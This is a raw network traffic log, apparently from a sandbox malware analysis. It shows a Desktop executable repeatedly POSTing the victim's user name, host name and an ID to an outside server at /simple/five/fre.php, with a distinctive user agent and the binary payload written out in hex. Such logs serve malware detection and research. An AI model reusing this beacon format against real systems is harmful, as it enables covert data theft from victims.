Jan 11, 2025 01:43:09.359796047 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:09 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.8	51236	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:09.509485960 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:09.514398098 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:10.257819891 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:10 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.8	51237	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:10.702166080 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:10.707200050 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:11.447506905 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:11 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.8	51238	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:11.602649927 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:11.607611895 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:12.357177019 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:12 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.8	51239	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:12.523875952 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:12.528796911 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:13.250133038 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:13 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.8	51240	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:13.567305088 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:13.572274923 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:14.455693960 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:14 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.8	51241	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:14.606277943 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:14.611221075 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:15.317781925 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:15 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.8	51242	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:15.463354111 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:15.469660997 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:16.169739962 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:16 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.8	51243	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:16.333803892 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:16.338866949 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:17.034079075 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:16 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.8	51244	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:17.180555105 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:17.186517000 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:18.008328915 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:17 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.8	51245	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:18.165544033 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:18.171448946 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:18.899002075 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:18 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.8	51246	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:19.044585943 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:19.049623966 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:19.775940895 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:19 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.8	51247	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:19.930483103 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:19.935375929 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:20.674877882 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:20 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.8	51248	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:20.820662022 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:20.826438904 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:21.529187918 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:21 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.8	51249	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:21.711738110 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:21.716741085 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:22.418973923 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:22 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.8	51250	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:22.573429108 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:22.578330994 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:23.300400972 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:23 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.8	51251	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:23.451675892 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:23.456553936 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:24.173432112 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:24 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.8	51252	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:24.322185993 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:24.327063084 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:25.031737089 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:24 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.8	51253	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:25.179891109 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:25.184735060 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:25.949522972 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:25 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.8	51254	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:26.104372025 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:26.109253883 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:26.814487934 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:26 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.8	51255	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:26.974829912 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:26.979790926 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:27.680749893 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:27 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.8	51256	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:27.840715885 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:27.847810984 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:28.609339952 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:28 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.8	51257	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:28.759398937 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:28.764296055 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
